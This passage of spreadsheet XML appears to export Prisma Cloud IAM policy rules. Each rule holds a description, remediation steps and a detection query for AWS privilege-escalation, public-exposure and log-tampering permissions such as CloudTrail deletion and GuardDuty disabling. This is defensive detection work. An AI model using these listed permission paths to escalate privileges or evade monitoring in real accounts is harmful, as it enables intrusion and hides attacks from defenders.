          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3129">
      <c r="A3129" t="inlineStr"/>
      <c r="B3129" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3129" s="2" t="inlineStr"/>
      <c r="D3129" t="n">
        <v>0</v>
      </c>
      <c r="E3129" t="n">
        <v>9</v>
      </c>
      <c r="F3129" t="n">
        <v>0</v>
      </c>
      <c r="G3129" t="b">
        <v>1</v>
      </c>
      <c r="H31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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3129" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3129" t="inlineStr">
        <is>
          <t>AWS EC2 IAM role with Elastic IP Hijacking permissions</t>
        </is>
      </c>
      <c r="L3129" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3129" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3129" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3129" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3129" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3129" t="inlineStr"/>
      <c r="R3129" t="inlineStr"/>
      <c r="S3129" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3129" t="b">
        <v>1</v>
      </c>
      <c r="U3129" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3129" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3129" t="inlineStr">
        <is>
          <t>This precision-crafted IAM policy provides vigilant control over essential actions within AWS, specifically targeting 'instance' resources. By meticulously governing access to actions like 'ec2:DisassociateAddress' and 'ec2:EnableAddressTransfer', this policy serves as a bulwark against unauthorized endeavors to transfer Elastic IPs to unauthorized accounts, bolstering the security of your cloud environment.</t>
        </is>
      </c>
      <c r="X3129"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2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29" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('ec2:DisassociateAddress', 'ec2:EnableAddressTransfer') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3129" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3129" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3129" t="inlineStr"/>
      <c r="AD3129" t="b">
        <v>1</v>
      </c>
      <c r="AE3129" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3129" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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29" t="inlineStr">
        <is>
          <t>0ac76a55-5858-4bf1-9e3a-506f976346a0</t>
        </is>
      </c>
      <c r="AI3129" t="inlineStr">
        <is>
          <t>0ac76a55-5858-4bf1-9e3a-506f976346a0</t>
        </is>
      </c>
      <c r="AJ3129" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3129" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3130">
      <c r="A3130" t="inlineStr"/>
      <c r="B3130" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3130" s="2" t="inlineStr"/>
      <c r="D3130" t="inlineStr"/>
      <c r="E3130" t="inlineStr"/>
      <c r="F3130" t="inlineStr"/>
      <c r="G3130" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3130" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3130" t="inlineStr">
        <is>
          <t>EC2 with IAM role attached has iam:PassRole and ec2:Run Instances permissions</t>
        </is>
      </c>
      <c r="L3130" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3130" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3130" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3130" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3130" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3130" t="inlineStr"/>
      <c r="R3130" t="inlineStr"/>
      <c r="S3130" t="inlineStr"/>
      <c r="T3130" t="b">
        <v>1</v>
      </c>
      <c r="U3130" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3130" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3130" t="inlineStr">
        <is>
          <t>This IAM policy enforces controlled access by permitting only the specified actions (iam:PassRole, ec2:RunInstances) within AWS, specifically for 'instance' resources. By limiting the scope of permissions to this focused context, potential risks and unauthorized activity are mitigated</t>
        </is>
      </c>
      <c r="X3130" t="inlineStr">
        <is>
          <t>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3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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('iam:PassRole','ec2:RunInstances') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance' AND source.cloud.type = 'AWS'</t>
        </is>
      </c>
      <c r="AA3130" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3130" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3130" t="inlineStr"/>
      <c r="AD3130" t="b">
        <v>1</v>
      </c>
      <c r="AE3130" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3130" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>801a688a-07ec-4b89-a928-6fd8fbd7bf88</t>
        </is>
      </c>
      <c r="AI3130" t="inlineStr">
        <is>
          <t>801a688a-07ec-4b89-a928-6fd8fbd7bf88</t>
        </is>
      </c>
      <c r="AJ3130" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3130" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3131">
      <c r="A3131" t="inlineStr"/>
      <c r="B3131" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3131" s="2" t="inlineStr"/>
      <c r="D3131" t="n">
        <v>0</v>
      </c>
      <c r="E3131" t="n">
        <v>9</v>
      </c>
      <c r="F3131" t="n">
        <v>0</v>
      </c>
      <c r="G3131" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3131" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3131" t="inlineStr">
        <is>
          <t>AWS EC2 machine with defense evasion impact of aws security services permissions</t>
        </is>
      </c>
      <c r="L3131" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3131" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3131" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3131" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3131" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3131" t="inlineStr"/>
      <c r="R3131" t="inlineStr"/>
      <c r="S3131" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3131" t="b">
        <v>1</v>
      </c>
      <c r="U3131" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3131" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3131" t="inlineStr">
        <is>
          <t>this policy identifies permissions that have the potential to cause damage if misused within AWS services. They grant the ability to modify, delete, or disable crucial security and monitoring features, leaving AWS resources vulnerable to threats, hindering incident investigations, and compromising compliance and configuration tracking. It is recommended to manage and grant these permissions to trusted individuals to maintain the security and integrity of AWS resources.</t>
        </is>
      </c>
      <c r="X3131"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3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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('guardduty:UpdateDetector','guardduty:DeleteDetector','guardduty:DeleteMembers','guardduty:UpdateFilter','guardduty:DeleteFilter','shield:DisableApplicationLayerAutomaticResponse','shield:UpdateProtectionGroup','shield:DeleteSubscription','detective:DisassociateMembership','detective:DeleteMembers','inspector:Disable','config:StopConfigurationRecorder','config:DeleteConfigurationRecorder','config:DeleteConfigRule','config:DeleteOrganizationConfigRule','cloudwatch:DisableAlarmActions','cloudwatch:DisableInsightRules') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3131" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3131" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3131" t="inlineStr"/>
      <c r="AD3131" t="b">
        <v>1</v>
      </c>
      <c r="AE3131" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3131" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>de1729b0-6b14-4d05-b3e6-c9486740f440</t>
        </is>
      </c>
      <c r="AI3131" t="inlineStr">
        <is>
          <t>de1729b0-6b14-4d05-b3e6-c9486740f440</t>
        </is>
      </c>
      <c r="AJ3131" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3131" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3132">
      <c r="A3132" t="inlineStr"/>
      <c r="B3132" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3132" s="2" t="inlineStr"/>
      <c r="D3132" t="inlineStr"/>
      <c r="E3132" t="inlineStr"/>
      <c r="F3132" t="inlineStr"/>
      <c r="G3132" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3132" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3132" t="inlineStr">
        <is>
          <t>AWS ECR Repository is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3132" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3132" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3132" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3132" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3132" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3132" t="inlineStr"/>
      <c r="R3132" t="inlineStr"/>
      <c r="S3132" t="inlineStr"/>
      <c r="T3132" t="b">
        <v>0</v>
      </c>
      <c r="U3132" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3132" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3132" t="inlineStr">
        <is>
          <t>This policy identifies AWS ECR Repositories with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3132" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS ECR Repository service
3. Find resource-based policy of the AWS ECR Repository resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3132" t="inlineStr"/>
      <c r="Z3132" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'ecr' AND dest.cloud.resource.type = 'repository' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3132" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3132" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3132" t="inlineStr"/>
      <c r="AD3132" t="b">
        <v>1</v>
      </c>
      <c r="AE3132" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3132" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>f7a860cf-8a2b-46f0-bb02-64d16c234344</t>
        </is>
      </c>
      <c r="AI3132" t="inlineStr">
        <is>
          <t>f7a860cf-8a2b-46f0-bb02-64d16c234344</t>
        </is>
      </c>
      <c r="AJ3132" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3132" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3133">
      <c r="A3133" t="inlineStr"/>
      <c r="B3133" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3133" s="2" t="inlineStr"/>
      <c r="D3133" t="inlineStr"/>
      <c r="E3133" t="inlineStr"/>
      <c r="F3133" t="inlineStr"/>
      <c r="G3133" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3133" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3133" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3133" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3133" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3133" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3133" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3133" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3133" t="inlineStr"/>
      <c r="R3133" t="inlineStr"/>
      <c r="S3133" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3133" t="b">
        <v>1</v>
      </c>
      <c r="U3133" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3133" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3133" t="inlineStr">
        <is>
          <t>This policy identifies IAM Users with unused Data Write Permissions. Unused IAM users with "Data Write" permissions pose a severe security risk, even after 90 days of inactivity. Here's why:
- Unrestricted Data Modification: Data Write allows users to modify, alter, or even delete critical data stored in AWS services. An attacker with these permissions could wreak havoc, corrupting or stealing sensitive information.
- Privilege Escalation: Data Write permissions can be used as a stepping stone. Attackers might exploit them to gain further control over your AWS environment and access even more sensitive resources.
Imagine handing someone a key to your vault and then forgetting about it. Unused Data Write access is just as dangerous. Here's how to mitigate the risk:
- Ruthless Review: Ruthlessly identify and disable all unused IAM users with Data Write permissions, regardless of how long they've been inactive.
- Principle of Least Privilege: Grant Data Write permissions only to specific users or machine identities that absolutely require them, and only for the minimum amount of time necessary.
-MFA Requirement: Enforce Multi-Factor Authentication (MFA) for all users with Data Write permissions. This significantly reduces the risk of unauthorized access, even if credentials are compromised.</t>
        </is>
      </c>
      <c r="X3133"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13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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3133" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3133" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3133" t="inlineStr"/>
      <c r="AD3133" t="b">
        <v>1</v>
      </c>
      <c r="AE3133" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3133" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>5bc1d9da-48a4-4275-9741-0696d0ebc781</t>
        </is>
      </c>
      <c r="AI3133" t="inlineStr">
        <is>
          <t>5bc1d9da-48a4-4275-9741-0696d0ebc781</t>
        </is>
      </c>
      <c r="AJ3133" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3133" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3134">
      <c r="A3134" t="inlineStr"/>
      <c r="B3134" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3134" s="2" t="inlineStr"/>
      <c r="D3134" t="n">
        <v>4</v>
      </c>
      <c r="E3134" t="n">
        <v>1</v>
      </c>
      <c r="F3134" t="n">
        <v>0</v>
      </c>
      <c r="G3134" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3134" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3134" t="inlineStr">
        <is>
          <t>AWS EC2 instance with the creation of a new Role with attached policy permission</t>
        </is>
      </c>
      <c r="L3134" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3134" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3134" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3134" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3134" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3134" t="inlineStr"/>
      <c r="R3134" t="inlineStr"/>
      <c r="S3134" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3134" t="b">
        <v>1</v>
      </c>
      <c r="U3134" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3134" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3134" t="inlineStr">
        <is>
          <t>With access to iam:CreateRole', 'iam:AttachRolePolicy' permissions, an adversary can elevate the access of the EC2 instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3134"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3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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:CreateRole', 'iam:AttachRolePolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3134" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3134" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3134" t="inlineStr"/>
      <c r="AD3134" t="b">
        <v>1</v>
      </c>
      <c r="AE3134" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3134" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>69e15d91-44c9-47de-bdc2-df35001d35ec</t>
        </is>
      </c>
      <c r="AI3134" t="inlineStr">
        <is>
          <t>69e15d91-44c9-47de-bdc2-df35001d35ec</t>
        </is>
      </c>
      <c r="AJ3134" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3134" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3135">
      <c r="A3135" t="inlineStr"/>
      <c r="B3135" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3135" s="2" t="inlineStr"/>
      <c r="D3135" t="n">
        <v>0</v>
      </c>
      <c r="E3135" t="n">
        <v>9</v>
      </c>
      <c r="F3135" t="n">
        <v>0</v>
      </c>
      <c r="G3135" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3135" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3135" t="inlineStr">
        <is>
          <t>AWS EC2 with cloud log tampering permissions</t>
        </is>
      </c>
      <c r="L3135" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3135" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3135" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3135" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3135" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3135" t="inlineStr"/>
      <c r="R3135" t="inlineStr"/>
      <c r="S3135" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3135" t="b">
        <v>1</v>
      </c>
      <c r="U3135" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3135" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3135" t="inlineStr">
        <is>
          <t>This policy identifies permissions that  have the potential to impact various AWS cloud logging services. They include the ability to delete important logs and trails, modify event selectors, stop logging, delete flow logs, configure bucket logging, delete log streams and groups, and manage logging configurations. Misuse of these permissions can result in the loss of crucial logging and monitoring data, hinder troubleshooting and analysis, and impact security event tracking. It is recommended to manage and grant these permissions to trusted individuals to maintain the security and integrity of AWS resources.</t>
        </is>
      </c>
      <c r="X3135"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3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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('cloudtrail:DeleteTrail','cloudtrail:PutEventSelectors','cloudtrail:StopLogging','ec2:DeleteFlowLogs','s3:PutBucketLogging','logs:DeleteLogStream','logs:DeleteLogGroup','waf:DeleteLoggingConfiguration','waf:PutLoggingConfiguration') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3135" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3135" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3135" t="inlineStr"/>
      <c r="AD3135" t="b">
        <v>1</v>
      </c>
      <c r="AE3135" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3135" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>ec8832eb-a95e-4ed9-9b13-cff519a597d3</t>
        </is>
      </c>
      <c r="AI3135" t="inlineStr">
        <is>
          <t>ec8832eb-a95e-4ed9-9b13-cff519a597d3</t>
        </is>
      </c>
      <c r="AJ3135" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3135" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3136">
      <c r="A3136" t="inlineStr"/>
      <c r="B3136" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3136" s="2" t="inlineStr"/>
      <c r="D3136" t="n">
        <v>0</v>
      </c>
      <c r="E3136" t="n">
        <v>9</v>
      </c>
      <c r="F3136" t="n">
        <v>0</v>
      </c>
      <c r="G3136" t="b">
        <v>1</v>
      </c>
      <c r="H31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36" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3136" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3136" t="inlineStr">
        <is>
          <t>Unprivileged service account can assume a Service Account with admin privileges</t>
        </is>
      </c>
      <c r="L3136" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3136" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3136" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3136" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3136" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3136" t="inlineStr"/>
      <c r="R3136" t="inlineStr"/>
      <c r="S3136" t="inlineStr"/>
      <c r="T3136" t="b">
        <v>1</v>
      </c>
      <c r="U3136" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3136" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3136" t="inlineStr">
        <is>
          <t>Identifies unprivileged (not administrator) service accounts which can assume service accounts with administrative permissions. This offers adversaries opportunities to escalate their privileges, thereby expanding the potential blast radius of a breach.</t>
        </is>
      </c>
      <c r="X3136" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the service account ("Source") and the role it can assume ("Granted By Entity"). The administrative role will be shown as the "Destination", and can be assumed by the grantor role ("Granted By Entity"). In cases where the source role ("Granted By Entity") and privileged role ("Destination") permissions are granted in different accounts, "Source" may contain administrative permissions for its original account.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grantor role ("Granted By Entity") so it cannot assume the privileged role.</t>
        </is>
      </c>
      <c r="Y313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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND grantedby.cloud.entity.type = 'role' AND source.cloud.resource.isadministrative = false AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3136" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3136" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3136" t="inlineStr"/>
      <c r="AD3136" t="b">
        <v>1</v>
      </c>
      <c r="AE3136" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3136" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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36" t="inlineStr">
        <is>
          <t>c2712542-6917-4352-940a-8cd87c48bbad</t>
        </is>
      </c>
      <c r="AI3136" t="inlineStr">
        <is>
          <t>c2712542-6917-4352-940a-8cd87c48bbad</t>
        </is>
      </c>
      <c r="AJ3136" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3136" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3137">
      <c r="A3137" t="inlineStr"/>
      <c r="B3137" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3137" s="2" t="inlineStr"/>
      <c r="D3137" t="n">
        <v>2</v>
      </c>
      <c r="E3137" t="n">
        <v>0</v>
      </c>
      <c r="F3137" t="n">
        <v>0</v>
      </c>
      <c r="G3137" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3137" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3137" t="inlineStr">
        <is>
          <t>Publicly Executable Lambda</t>
        </is>
      </c>
      <c r="L3137" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3137" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3137" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3137" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3137" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3137" t="inlineStr"/>
      <c r="R3137" t="inlineStr"/>
      <c r="S3137" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3137" t="b">
        <v>0</v>
      </c>
      <c r="U3137" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3137" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3137" t="inlineStr">
        <is>
          <t>Identifies Lambda functions that can be triggered or executed by unauthorized users.</t>
        </is>
      </c>
      <c r="X3137" t="inlineStr">
        <is>
          <t>Remediation steps:
Via Console:
1. Log in to your AWS account
2. Navigate to the Lambda function
3. Under the 'Configuration' tab, select 'Permissions'
4. Under 'Resource-based policy statements' edit the resource policy to only allow required parties to invoke the function
Via CLI:
1. Log into your AWS account
2. Run 'aws lambda get-policy --function-name &lt;function arn&gt;' in order to get the statement-id for your current resource policy
3. Run 'aws lambda remove-permission' with the required arguments in order to remove the resource policy
4. Run 'aws lambda add-permission' to specify a new resource policy only allowing required parties to invoke the function</t>
        </is>
      </c>
      <c r="Y3137" t="inlineStr"/>
      <c r="Z3137" t="inlineStr">
        <is>
